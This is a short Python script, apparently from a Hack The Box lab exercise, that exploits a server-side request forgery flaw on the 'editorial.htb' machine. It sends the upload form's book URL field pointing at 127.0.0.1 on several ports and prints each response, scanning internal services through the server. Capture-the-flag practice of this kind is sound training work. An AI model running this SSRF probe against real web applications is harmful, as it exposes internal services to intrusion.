This script was generated with the help of chatgpt to test for certain ports in the HTB editorial machine SSRF vulnerability

port_scan.py

import requests

# List of ports to test
ports = [80, 8080, 8000, 6666, 8081, 5000]

# URL and headers for the POST request
url = "http://editorial.htb/upload-cover"
headers = {
    "Host": "editorial.htb",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "multipart/form-data; boundary=---------------------------49391253437583440473430002952",
    "Origin": "http://editorial.htb",
    "DNT": "1",
    "Connection": "close",
    "Referer": "http://editorial.htb/upload"
}

# Function to create multipart form data
def create_form_data(port):
    boundary = "-----------------------------49391253437583440473430002952"
    form_data = (
        f"{boundary}\r\n"
        f'Content-Disposition: form-data; name="bookurl"\r\n\r\n'
        f"http://127.0.0.1:{port}\r\n"
        f"{boundary}\r\n"
        f'Content-Disposition: form-data; name="bookfile"; filename="TEST"\r\n'
        f"Content-Type: application/octet-stream\r\n\r\n\r\n"
        f"{boundary}--\r\n"
    )
    return form_data

# Loop through each port and make the POST request
for port in ports:
    form_data = create_form_data(port)
    headers["Content-Length"] = str(len(form_data))
    
    response = requests.post(url, headers=headers, data=form_data.encode('utf-8'))
    
    # Print the response status and content for each port
    print(f"Port: {port}")
    print(f"Status Code: {response.status_code}")
    print(f"Response Text: {response.text}\n")